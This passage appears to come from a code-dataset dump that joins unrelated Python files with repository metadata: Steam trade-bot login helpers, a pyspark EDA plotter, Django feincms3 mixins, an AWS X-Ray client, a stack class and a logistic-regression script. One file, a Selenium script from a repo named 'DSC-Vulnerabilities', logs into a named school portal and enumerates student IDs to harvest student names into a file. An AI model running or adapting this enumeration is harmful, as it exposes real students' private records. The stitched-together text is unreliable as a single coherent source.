TRADEOFFER_URL = "https://steamcommunity.com/tradeoffer/new/?partner={0}&token={1}"
LOGGED = {} # Don't use this directly, use check_or_login
# Sessions are cached on disk so later runs can skip a fresh login
# (faster, and avoids tripping Steam's login detection).
def _save_session(client):
    """Pickle the client's session cookies to <steamid>.session on disk."""
    sid = client.steam_guard['steamid']
    session_path = os.path.join(USER_DATA_FOLDER, sid + ".session")
    with open(session_path, "wb") as out:
        pickle.dump(client._session.cookies, out)
# Loading pickle file and create new SteamClient object and return it
def _login_from_session(steamid):
    """Rebuild a SteamClient from a pickled cookie jar on disk.

    Returns the client when the restored session is still alive; returns
    None (explicitly or by falling off the end) when no session file
    exists or the restored session has expired.
    """
    print("Logging {0} from session file".format(db.get_account_username_by_steamid(steamid)))
    account = db.get_all_creds_by_steamid(steamid)
    path = os.path.join(USER_DATA_FOLDER, steamid + ".session")
    if not os.path.exists(path):
        return None
    # <steamid>.json holds the SDA secrets (see generate_from_mafile).
    sg_path = os.path.join(USER_DATA_FOLDER, steamid + ".json")
    session = requests.session()
    with open(path, 'rb') as f:
        session.cookies.update(pickle.load(f))
    client = SteamClient(account['steamapikey'], account['username'], account['password'], sg_path)
    # Inject the restored session and mark the client as logged in
    # without going through client.login().
    client._session = session
    client.was_login_executed = True
    if client.is_session_alive():
        print("LOGGED FROM SESSION")
        return client
# Logging to Steam Web API and returns SteamClient instance via steampy
# ONLY FOR check_or_login FUNCTION!!! INSTEAD OF THIS USE check_or_login
def _login(steamid):
    """Perform a fresh credential login for *steamid* and cache the session."""
    print("Logging {0}".format(db.get_account_username_by_steamid(steamid)))
    creds = db.get_login_creds_by_steamid(steamid)
    user, secret, api_key = creds
    steam_client = SteamClient(api_key)
    steam_client.login(user, secret, generate_path_by_steamid(steamid))
    # Persist cookies so the next run can log in from the session file.
    _save_session(steam_client)
    print("LOGGED")
    return steam_client
# Login only with that function
def check_or_login(steamid):
    """Return a logged-in SteamClient for *steamid*.

    Attempts, in order: the pickled session file, the in-memory LOGGED
    cache, and finally a fresh credential login.
    """
    # NOTE(review): the session file is re-read on *every* call, even
    # when LOGGED already holds a live client -- the in-memory cache is
    # only consulted when no usable session file exists.  Confirm this
    # is intended before reordering.
    client = _login_from_session(steamid)
    if client:
        LOGGED[steamid] = client
        return LOGGED[steamid]
    if steamid in LOGGED:
        # Cached client: re-login only if its session has expired.
        if not LOGGED[steamid].is_session_alive():
            LOGGED[steamid] = _login(steamid)
    else:
        LOGGED[steamid] = _login(steamid)
    return LOGGED[steamid]
# Generates steam64id from profile url
def steamid_from_url(url):
    """Resolve a Steam community profile URL to its 64-bit Steam ID
    via the ``steam`` library."""
    return steam.steamid.steam64_from_url(url)
# Import an SDA (Steam Desktop Authenticator) maFile: keep only the
# shared_secret, identity_secret and steam64 id.
def generate_from_mafile(path):
    """Extract the secrets from the maFile at *path*, write them to
    USER_DATA_FOLDER/<steamid>.json, and return them as a dict."""
    with open(path, 'r', encoding='utf-8') as src:
        mafile = json.loads(src.read())
    secrets = {
        'steamid': str(mafile['Session']['SteamID']),
        'shared_secret': mafile['shared_secret'],
        'identity_secret': mafile['identity_secret'],
    }
    target = os.path.join(USER_DATA_FOLDER, secrets['steamid'] + '.json')
    with open(target, 'w', encoding='utf-8') as dst:
        dst.write(json.dumps(secrets, ensure_ascii=False, sort_keys=True, indent=4))
    return secrets
# Helper for generate path to shared_secret file by steamid
def generate_path_by_steamid(steamid):
    """Path of the <steamid>.json secrets file inside USER_DATA_FOLDER."""
    return os.path.join(USER_DATA_FOLDER, steamid + ".json")
# partner, token, message - are provided by tm
# items_ids == [item_assetid1, item_assetid2, ...], same provided by tm
def make_offer(steamid, partner, token, message, items_ids):
    """Send a one-sided trade offer of the given CS:GO items.

    Returns True when the steampy response reports success, else False.
    """
    trade_url = TRADEOFFER_URL.format(partner, token)
    offer_assets = [Asset(asset_id, GAME) for asset_id in items_ids]
    client = check_or_login(steamid)
    result = client.make_offer_with_url(offer_assets, [], trade_url, message)
    return bool(result.get('success'))
if __name__ == '__main__':
    # Manual check: log in a hard-coded account and print one market price.
    # The commented lines below were used to import an SDA maFile once.
    # if not os.path.exists(USER_DATA_FOLDER):
    #     os.mkdir(USER_DATA_FOLDER)
    # path = sys.argv[1]
    # generate_from_mafile(path)
    client = check_or_login("76561198983927239")
    item = 'M4A1-S | Cyrex (Factory New)'
    print(client.market.fetch_price(item, game=GameOptions.CS))
"amgeow@gmail.com"
] | amgeow@gmail.com |
4f2e094308971e7278a9ee7bc2400e22fc046ba7 | 39023557444c7448766215bd2e29e043caf3b1df | /dsutils/evaluate.py | c28ba8dc53d9fbf06852ea7b1deb168f5d1b43d0 | [
"MIT"
] | permissive | RTJ19/dsutils_dev | 95899bd1fddafc4cb8a11f74e21abae75613957f | 92dc6f6583d80cd23a1afa935ec33df796efdc39 | refs/heads/master | 2020-08-31T13:24:34.402058 | 2019-11-30T08:06:54 | 2019-11-30T08:06:54 | 218,700,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,103 | py | import matplotlib.pyplot as plt
import pyspark.sql.functions as F
from pyspark.sql import Window
from pyspark_dist_explore import hist
from tqdm import tqdm_notebook as tqdm
def get_eda_plots(df, only_categorical=False, only_numerical=False ,\
        hspace=0.5,wspace=0.5,numerical_figsize=(15,15),\
        categorical_figsize=(15,25),bins=25):
    """
    Quick EDA subplots for a pyspark DataFrame.

    Numerical (non-string dtype) columns get histograms; categorical
    (string dtype) columns get bar charts of each category's percentage
    share.  Plots are laid out on a two-column grid; with an odd column
    count the last subplot is repeated to fill the grid.

    df -- pyspark DataFrame to explore
    only_categorical / only_numerical -- skip the numerical resp.
        categorical section
    hspace, wspace -- subplot spacing (subplots_adjust)
    numerical_figsize, categorical_figsize -- figure sizes
    bins -- histogram bin count for numerical columns
    """
    # ---- numerical columns ------------------------------------------
    if only_categorical != True:
        numerical_labels = [item[0] for item in df.dtypes if not item[1].startswith('string')]
        # print (numerical_labels)
        if (len(numerical_labels) % 2) == 0:
            numerical_labels2=numerical_labels
        else:
            # Odd count: duplicate the last column to fill the 2-col grid.
            # NOTE(review): this is an alias, not a copy, so the append
            # also mutates ``numerical_labels`` -- harmless here, but
            # confirm it is intended.
            numerical_labels2=numerical_labels
            numerical_labels2.append(numerical_labels[-1])
            print("Numerical columns has Odd number of features\n hence last subplot will be repeated")
        fig = plt.figure(figsize=numerical_figsize)
        fig.subplots_adjust(hspace=hspace, wspace=wspace)
        print ("Plotting numerical columns...")
        for column,i in tqdm(zip(numerical_labels2,range(1, len(numerical_labels2)+1)),total = len(numerical_labels2)):
            # NOTE(review): round(x + 0.5) uses banker's rounding on
            # Python 3 and can allocate an extra blank subplot row.
            ax = fig.add_subplot(round((len(numerical_labels2)/2)+0.5), 2, i)
            # hist() is pyspark_dist_explore's Spark-side histogram.
            hist(ax, x=df.select(column), bins=bins)
            ax.set_title(column)
            ax.legend()
    # ---- categorical columns ----------------------------------------
    if only_numerical != True:
        categorical_labels = [item[0] for item in df.dtypes if item[1].startswith('string')]
        # print (categorical_labels)
        if (len(categorical_labels) % 2) == 0:
            categorical_labels2=categorical_labels
        else:
            # Same duplicate-last-column trick (and the same aliasing).
            categorical_labels2=categorical_labels
            categorical_labels2.append(categorical_labels[-1])
            print("Categorical labels has Odd number of features\n hence last subplot will be repeated")
        fig = plt.figure(figsize=(categorical_figsize))
        fig.subplots_adjust(hspace=hspace, wspace=wspace)
        # plt.xticks(rotation=45)
        print ("Plotting categorical columns...")
        for column,i in tqdm(zip(categorical_labels2,range(1, len(categorical_labels2)+1)),total = len(categorical_labels2)):
            # Percentage per category: per-category counts divided by the
            # window-total over all categories.
            window = Window.rowsBetween(Window.unboundedPreceding,Window.unboundedFollowing)
            tab = df.select([column]).\
                groupBy(column).\
                agg(F.count(column).alias('num'),
                    ).\
                withColumn('total',F.sum(F.col('num')).over(window)).\
                withColumn('percent',F.col('num')*100/F.col('total')).\
                drop(F.col('total'))
            # NOTE(review): tab.collect() runs the Spark job twice;
            # collecting once and splitting locally would halve the work.
            categories = [(row[column]) for row in tab.collect()]
            category_percentage = [(row.percent) for row in tab.collect()]
            ax = fig.add_subplot(round((len(categorical_labels2)/2)+0.5), 2, i)
            ax.bar(categories, category_percentage, label="percentage")
            plt.xticks(rotation=45)
            ax.set_title(column)
            ax.legend()
| [
"noreply@github.com"
] | RTJ19.noreply@github.com |
1a0586b543e61229aa5c7ecc3626c76951c49596 | aea3b522c0f8c6f82279cf6cc70bc11b22ef9f02 | /feincms3/mixins.py | 872c3c2269da46af9112d0eb37dba939ddbcdc59 | [
"BSD-2-Clause"
] | permissive | hancush/feincms3 | 0dfbb98f85f9bd2c2edf98cdb8de298f0188b17c | 782a4ee83a36756752b2f9aa225eed4dc402ff4c | refs/heads/master | 2020-04-04T11:55:39.289197 | 2018-10-31T18:49:47 | 2018-10-31T18:49:47 | 155,908,332 | 0 | 0 | NOASSERTION | 2018-11-02T18:44:39 | 2018-11-02T18:44:39 | null | UTF-8 | Python | false | false | 5,877 | py | # coding=utf-8
from django.conf import settings
from django.db import models
from django.db.models import signals
from django.utils.translation import activate, get_language, ugettext_lazy as _
from tree_queries.fields import TreeNodeForeignKey
from feincms3.utils import validation_error
class MenuMixin(models.Model):
    """
    The ``MenuMixin`` is most useful on pages where there are menus with
    differing content on a single page, for example the main navigation
    and a meta navigation (containing contact, imprint etc.)

    Concrete subclasses provide a ``MENUS`` class attribute (a choices
    sequence); it is copied into the field below at class-preparation time.
    """

    menu = models.CharField(
        _("menu"),
        max_length=20,
        blank=True,
        # Placeholder; real choices are filled in by fill_menu_choices.
        choices=(("", ""),),  # Non-empty choices for get_*_display
    )

    class Meta:
        abstract = True

    @staticmethod
    def fill_menu_choices(sender, **kwargs):
        """
        Fills in the choices for ``menu`` from the ``MENUS`` class variable.

        This method is a receiver of Django's ``class_prepared`` signal.
        """
        if issubclass(sender, MenuMixin) and not sender._meta.abstract:
            field = sender._meta.get_field("menu")
            field.choices = sender.MENUS
            # The first MENUS entry becomes the field default.
            field.default = field.choices[0][0]


signals.class_prepared.connect(MenuMixin.fill_menu_choices)
class TemplateMixin(models.Model):
    """
    It is sometimes useful to have different templates for CMS models such
    as pages, articles or anything comparable. The ``TemplateMixin``
    provides a ready-made solution for selecting django-content-editor
    ``Template`` instances through Django's administration interface.

    Concrete subclasses provide a ``TEMPLATES`` class attribute (a list of
    template objects with ``key``, ``title`` and ``regions``); it is wired
    into the field below at class-preparation time.
    """

    template_key = models.CharField(
        _("template"),
        max_length=100,
        # Placeholder; real choices are filled in by fill_template_key_choices.
        choices=(("", ""),),  # Non-empty choices for get_*_display
    )

    class Meta:
        abstract = True

    @property
    def template(self):
        """
        Return the selected template instance if the ``template_key`` field
        matches, or ``None``.
        """
        return self.TEMPLATES_DICT.get(self.template_key)

    @property
    def regions(self):
        """
        Return the selected template instances' ``regions`` attribute, falling
        back to an empty list if no template instance could be found.
        """
        return self.template.regions if self.template else []

    @staticmethod
    def fill_template_key_choices(sender, **kwargs):
        """
        Fills in the choices for ``template_key`` from the ``TEMPLATES``
        class variable.

        This method is a receiver of Django's ``class_prepared`` signal.
        """
        if issubclass(sender, TemplateMixin) and not sender._meta.abstract:
            field = sender._meta.get_field("template_key")
            field.choices = [(t.key, t.title) for t in sender.TEMPLATES]
            # The first template is the default; TEMPLATES_DICT enables
            # key-based lookup in the ``template`` property above.
            field.default = sender.TEMPLATES[0].key
            sender.TEMPLATES_DICT = {t.key: t for t in sender.TEMPLATES}


signals.class_prepared.connect(TemplateMixin.fill_template_key_choices)
class LanguageMixin(models.Model):
    """
    Pages may come in varying languages. ``LanguageMixin`` helps with that.
    """

    language_code = models.CharField(
        _("language"),
        max_length=10,
        choices=settings.LANGUAGES,
        # The first configured language is the default.
        default=settings.LANGUAGES[0][0],
    )

    class Meta:
        abstract = True

    def activate_language(self, request):
        """
        ``activate()`` the page's language and set ``request.LANGUAGE_CODE``
        """
        # Do what LocaleMiddleware does.
        activate(self.language_code)
        request.LANGUAGE_CODE = get_language()
class RedirectMixin(models.Model):
    """
    The ``RedirectMixin`` allows adding redirects in the page tree.

    A page may redirect either to a raw URL or to another page, and
    ``clean_fields`` rejects configurations that would produce ambiguous
    or chained redirects.
    """

    redirect_to_url = models.CharField(_("Redirect to URL"), max_length=200, blank=True)
    redirect_to_page = TreeNodeForeignKey(
        "self",
        on_delete=models.SET_NULL,
        blank=True,
        null=True,
        related_name="+",
        verbose_name=_("Redirect to page"),
    )

    class Meta:
        abstract = True

    def clean_fields(self, exclude=None):
        """
        Ensure that redirects are configured properly.

        Raises a validation error when both redirect values are set, when
        a page redirects to itself, or when a redirect chain (A -> B -> C,
        in either direction) would be created.
        """
        super(RedirectMixin, self).clean_fields(exclude)

        # At most one of the two redirect targets may be set.
        if self.redirect_to_url and self.redirect_to_page_id:
            raise validation_error(
                _("Only set one redirect value."),
                field="redirect_to_url",
                exclude=exclude,
            )
        if self.redirect_to_page_id:
            # A page redirecting to itself would loop forever.
            if self.redirect_to_page_id == self.pk:
                raise validation_error(
                    _("Cannot redirect to self."),
                    field="redirect_to_page",
                    exclude=exclude,
                )
            # Forbid chains: the target page must not itself redirect.
            if self.redirect_to_page.redirect_to_page_id:
                raise validation_error(
                    _(
                        "Do not chain redirects. The selected page redirects"
                        " to %(title)s (%(path)s)."
                    )
                    % {
                        "title": self.redirect_to_page,
                        "path": self.redirect_to_page.get_absolute_url(),
                    },
                    field="redirect_to_page",
                    exclude=exclude,
                )
        if self.redirect_to_url or self.redirect_to_page_id:
            # Any page redirects to this page?
            other = self.__class__._default_manager.filter(redirect_to_page=self)
            if other:
                raise validation_error(
                    _(
                        "Do not chain redirects. The page %(page)s already"
                        " redirects to this page."
                    )
                    % {"page": ", ".join("%s" % page for page in other)},
                    field="redirect_to_page",
                    exclude=exclude,
                )
| [
"mk@feinheit.ch"
] | mk@feinheit.ch |
f08bad40280e387f7a256b2948525a086e40bdc5 | 255c4794cfed32d3e7a4225de1db31b00679c932 | /UserIDPictureSaving.py | ebfe84846d4ba4d2bda0af5ecab182b8cc010aaf | [] | no_license | JPeterD/DSC-Vulnerabilities | fb1b179e9dbf2c3f3d57e1dc63dc6da071b74a93 | 7ac585c70b90a9a9362243f38e447675872568a2 | refs/heads/master | 2022-12-09T18:59:28.260614 | 2020-09-12T20:54:30 | 2020-09-12T20:54:30 | 295,024,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,574 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
import urllib3
# Path to your chromedriver
pchromdriver = '/usr/lib/chromium-browser/chromedriver'
browser = webdriver.Chrome(executable_path=pchromdriver)

# Open the login page.
url = 'https://dsc.orbund.com/einstein-freshair/student_frameset.jsp'
browser.get(url)

username = browser.find_element_by_name("username")
password = browser.find_element_by_name("password")
user = ' '  # your username goes here
pw = ' '  # your password goes here
username.send_keys(user)
password.send_keys(pw)

# Role selector: 1 for student, 3 for instructor, 4 for admin, 6 for staff
select = Select(browser.find_element_by_name('role'))
select.select_by_value(' ')
browser.find_element_by_id("loginBtn").click()

# Probe a range of student IDs and record "<full name> <id>" for every
# user that exists.  Fixes vs. the previous version: the output file is
# opened with ``with`` so it is closed even if Selenium raises mid-loop,
# the handle no longer shadows a builtin name, the bare ``except:`` no
# longer swallows KeyboardInterrupt/SystemExit, and the manual
# while/increment loop is a ``range``.
report_url = 'https://dsc.orbund.com/einstein-freshair/print_progressreport.jsp?studentid='
trailing = '&semesterid=59&classid=12500&subjectid=11125&sortOrder=0&sortingColumn=testDate'
with open("studentnames", "w") as names_file:
    # Student IDs to probe: start inclusive, end exclusive.
    for studentid in range(15400, 15405):
        browser.get(''.join([report_url, str(studentid), trailing]))
        try:
            student = browser.find_element_by_xpath(
                "//html/body/table[1]/tbody/tr[3]/td[2]")
        except Exception:
            # Name cell missing -> this student id is unused.
            print("This user does not exist")
        else:
            names_file.write("\n" + student.text + " " + str(studentid))
browser.close()
"noreply@github.com"
] | JPeterD.noreply@github.com |
508bb4c1db151ac198819deeafd7f02c0c2081d2 | b176114c038e2e1babd1930f9c2cd5bfae759eac | /lib/aws/xray/client.py | 3e7ad5632afa9934707cac46be55d8e3a00d9bde | [] | no_license | Datenworks/xray2elasticsearch | 5a1828f70b86d924809c1cb0be3a7c482653fa76 | 2d52329a9d0655c5645f4799e7eb098a2db5af96 | refs/heads/master | 2022-12-11T15:43:05.913962 | 2020-09-11T17:51:58 | 2020-09-11T17:51:58 | 294,723,721 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,167 | py | import boto3
from datetime import datetime, timedelta
from lib import log
class XrayClient(object):
def __init__(self):
self.client = boto3.client('xray')
def get_trace_summaries(self,
start: datetime,
end: datetime,
filter_expression: str = 'ok or !ok',
next_token: str = ''):
return self.client\
.get_trace_summaries(StartTime=start,
EndTime=end,
FilterExpression=filter_expression,
NextToken=next_token)
def batch_get_traces(self, trace_ids: list):
return self.client.batch_get_traces(TraceIds=trace_ids)
def trace_by_id(self, trace_id: str):
return self.batch_get_traces(trace_ids=[trace_id])
def trace_ids_iterator(self,
start: datetime,
end: datetime,
filter_expr: str = 'ok or !ok'):
if not self.__less_than_24_hours(start, end):
end = start + timedelta(seconds=23*60*60)
response = self.get_trace_summaries(start=start,
end=end,
filter_expression=filter_expr)
next_token = response.get('NextToken', None)
while True:
summaries = response["TraceSummaries"]
log(f"Fetching {len(summaries)} trace summaries IDs")
for summary in summaries:
yield summary['Id']
if next_token is None:
break
summaries = self.get_trace_summaries(start=start,
end=end,
filter_expression=filter_expr,
next_token=next_token)
next_token = summaries.get('NextToken', None)
def __less_than_24_hours(self, start, end):
difference = end - start
return difference.total_seconds() < 24 * 60 * 60
| [
"richard.lopes@datenworks.com"
] | richard.lopes@datenworks.com |
ef12eac455fda006c09060cce2af4e26af2be958 | 383cc6bbed4d52d3c37723fcc52660c62698cc2e | /Exercise_2.py | d39db3375acca0fcc37932758b9a231e77c94c3d | [] | no_license | nikrasiya/PreCourse_1 | 44435af405c27f3dd5cee8832e6da2c0b4e95943 | e3f1d659e5574805a1d7ecf66d49027007c6dce1 | refs/heads/master | 2020-09-15T03:19:33.666707 | 2020-01-05T13:26:26 | 2020-01-05T13:26:26 | 223,335,958 | 0 | 0 | null | 2019-11-22T06:11:31 | 2019-11-22T06:11:29 | null | UTF-8 | Python | false | false | 2,505 | py | class Node:
def __init__(self, data):
self.data = data
self.next = None
def __str__(self):
return f'{self.data}'
class Stack:
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def __init__(self):
self.top = None
self.stack_size = 0
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def isEmpty(self):
return self.stack_size == 0
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def push(self, data):
node = Node(data)
if self.top:
node.next = self.top
self.top = node
self.stack_size += 1
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def pop(self):
if self.top:
data = self.top.data
if self.top.next:
self.top = self.top.next
else:
self.top = None
self.stack_size -= 1
return data
else:
return None
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def peek(self):
return self.top.data if self.top else None
'''
Time Complexity: Constant O(1)
Space Complexity: Constant O(1)
'''
def size(self):
return self.stack_size
'''
Time Complexity: Linear O(n)
Space Complexity: Constant O(1)
'''
def show(self):
cur = self.top
result = ''
while cur:
result += f'{cur} '
cur = cur.next
return result
a_stack = Stack()
while True:
print('push <value>')
print('pop')
print('peek')
print('isEmpty')
print('show')
print('size')
print('quit')
do = input('What would you like to do? ').split()
operation = do[0].strip().lower()
if operation == 'push':
a_stack.push(int(do[1]))
elif operation == 'pop':
popped = a_stack.pop()
if popped is None:
print('Stack is empty.')
else:
print('Popped value: ', int(popped))
elif operation == 'isempty':
print(a_stack.isEmpty())
elif operation == 'peek':
print(a_stack.peek())
elif operation == 'show':
print(a_stack.show())
elif operation == 'size':
print(a_stack.size())
elif operation == 'quit':
break
| [
"noreply@github.com"
] | nikrasiya.noreply@github.com |
cc1bf5a3a967c4792c02aa5ab55641dc928afbf9 | 9ede69f65681a2d75d74919bddbaef2b50c20e18 | /LogisticReal.py | 3f6bbc7764967ca9e2da4cadd4d413fa3aba89e3 | [] | no_license | DarcyMyers/maclearn | b30fa8c9ab9375e7055bfee8b629201eceb3aa0c | 2275b5b6fface75b9c1007183cb72eb27b31976b | refs/heads/master | 2021-01-13T07:16:46.263997 | 2016-08-29T01:42:04 | 2016-08-29T01:42:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,541 | py | from collections import OrderedDict
import copy
import numpy
from numpy import mean
import pandas
from pandas import DataFrame
from pandas import Series
import scipy
import sklearn
import sklearn.cross_validation
from sklearn.cross_validation import ShuffleSplit
import sklearn.feature_selection
import sklearn.linear_model
import sklearn.pipeline
import MaclearnUtilities
from MaclearnUtilities import bhfdr
from MaclearnUtilities import colcor
import RestrictedData
# Data matrices and labels prepared by RestrictedData; each is a mapping
# keyed by data-set name (presumably xnorms holds the normalized feature
# matrices -- TODO confirm in RestrictedData).
xs = RestrictedData.xs
xnorms = RestrictedData.xnorms
annots = RestrictedData.annots
ys = RestrictedData.ys
ynums = RestrictedData.ynums

# One 5-repeat 80/20 shuffle-split CV schedule per data set;
# random_state pins the folds so runs are reproducible.
cvSchedules = {k : ShuffleSplit(len(ys[k]),
                                n_iter = 5,
                                test_size = 0.2,
                                random_state = 123)
               for k in xnorms}
def pandaize(f):
    """Decorator that converts the ``X`` argument (e.g. a pandas
    DataFrame) to a plain numpy array before calling ``f``.

    The wrapped callable keeps the ``(estimator, X, y, **kwargs)``
    signature and forwards the return value of ``f`` unchanged.
    """
    def pandaized(estimator, X, y, **kwargs):
        # Use numpy.array explicitly: the bare name ``array`` is not
        # imported in this module (only ``numpy`` and ``mean`` are), so
        # calling ``array(X)`` raised NameError at call time.
        return f(estimator, numpy.array(X), y, **kwargs)
    return pandaized
@pandaize
def cross_val_score_pd(estimator, X, y, **kwargs):
    """``cross_val_score`` wrapper that accepts pandas input
    (``pandaize`` converts X to a numpy array before the call)."""
    return sklearn.cross_validation.cross_val_score(
        estimator, X, y, **kwargs)
def fitModelWithNFeat(fitter, n, setname, cv=None):
    """Mean cross-validated score of ``fitter`` on data set ``setname``
    using the ``n`` best features (univariate F-test selection).

    Returns None when ``n`` exceeds the number of available features.
    ``cv`` defaults to the module-level schedule for the data set.
    """
    if cv is None:
        cv = cvSchedules[setname]
    if n > xnorms[setname].shape[1]:
        return None
    # Feature selection lives inside the pipeline, so it is re-fit on
    # each training fold (no selection leakage from the test fold).
    fsFitter = sklearn.pipeline.Pipeline([
        ('featsel', sklearn.feature_selection.SelectKBest(
            sklearn.feature_selection.f_regression, k=n)),
        ('classifier', fitter)
    ])
    return mean(cross_val_score_pd(estimator = fsFitter,
                                   X = xnorms[setname],
                                   y = ynums[setname],
                                   cv = cv))
def accPlot(accsByNFeats):
    """Plot score vs. feature count (log-x), one line per data set.

    ``accsByNFeats`` maps set name -> {n_features: score}.
    NOTE(review): relies on a global ``plt`` that is not imported in
    this module (works under %pylab / an interactive session) -- confirm.
    """
    ax = plt.subplot(111)
    for s in accsByNFeats:
        # One single-row frame per feature count, concatenated so the
        # result can be plotted with DataFrame.plot.
        plotdata = pandas.concat([DataFrame({"p" : p,
                                             "acc" : accsByNFeats[s][p]},
                                            index = [str(p)])
                                  for p in accsByNFeats[s]],
                                 axis = 0)
        plotdata.plot(x = "p",
                      y = "acc",
                      ax = ax,
                      logx = True,
                      label = s)
# Feature-count grid used by the regularized runs below.
nFeatures = [2, 5, 10, 20, 50, 100, 200, 500,
             1000, 2000, 5000, 10000]


## -----------------------------------------------------------------
## no (err...very little) regularization
## -----------------------------------------------------------------
def fitLogisticWithNFeat(**kwargs):
    """CV score for logistic regression with C=1e10, i.e. effectively
    unregularized; kwargs are forwarded to fitModelWithNFeat."""
    fitter = sklearn.linear_model.LogisticRegression(
            penalty="l2", C=1e10)
    return fitModelWithNFeat(fitter=fitter, **kwargs)

# Smaller grid for the unregularized runs (up to 200 features only).
nFeatNoReg = [2, 5, 10, 20, 50, 100, 200]
accsByNFeats = OrderedDict([(s,
                             OrderedDict([(
                                     n,
                                     fitLogisticWithNFeat(n=n, setname=s))
                                     for n in nFeatNoReg]))
                            for s in xnorms])
# Blank out entries where the feature count exceeds the sample count
# (number of rows in the data set).
for s in accsByNFeats:
    for n in accsByNFeats[s]:
        if n > xnorms[s].shape[0]:
            accsByNFeats[s][n] = None

plt.clf()
accPlot(accsByNFeats)
## -----------------------------------------------------------------
## L2 regularization
## -----------------------------------------------------------------
def fitL2LogisticWithNFeat(**kwargs):
    """CV score for L2-regularized logistic regression (C=1);
    kwargs are forwarded to fitModelWithNFeat."""
    fitter = sklearn.linear_model.LogisticRegression(
            penalty="l2", C=1)
    return fitModelWithNFeat(fitter=fitter, **kwargs)

# Score per data set and feature count over the full nFeatures grid.
accsByNFeatsL2 = OrderedDict([(s,
                               OrderedDict([(
                                       n,
                                       fitL2LogisticWithNFeat(n=n, setname=s))
                                       for n in nFeatures]))
                              for s in xnorms])

plt.clf()
accPlot(accsByNFeatsL2)
## -----------------------------------------------------------------
## L1 regularization
## -----------------------------------------------------------------
def fitL1LogisticWithNFeat(**kwargs):
    """CV score for L1-regularized (sparse) logistic regression (C=1);
    kwargs are forwarded to fitModelWithNFeat."""
    fitter = sklearn.linear_model.LogisticRegression(
            penalty="l1", C=1)
    return fitModelWithNFeat(fitter=fitter, **kwargs)

# Score per data set and feature count over the full nFeatures grid.
accsByNFeatsL1 = OrderedDict([(s,
                               OrderedDict([(
                                       n,
                                       fitL1LogisticWithNFeat(n=n, setname=s))
                                       for n in nFeatures]))
                              for s in xnorms])

plt.clf()
accPlot(accsByNFeatsL1)
| [
"denniscwylie@users.noreply.github.com"
] | denniscwylie@users.noreply.github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.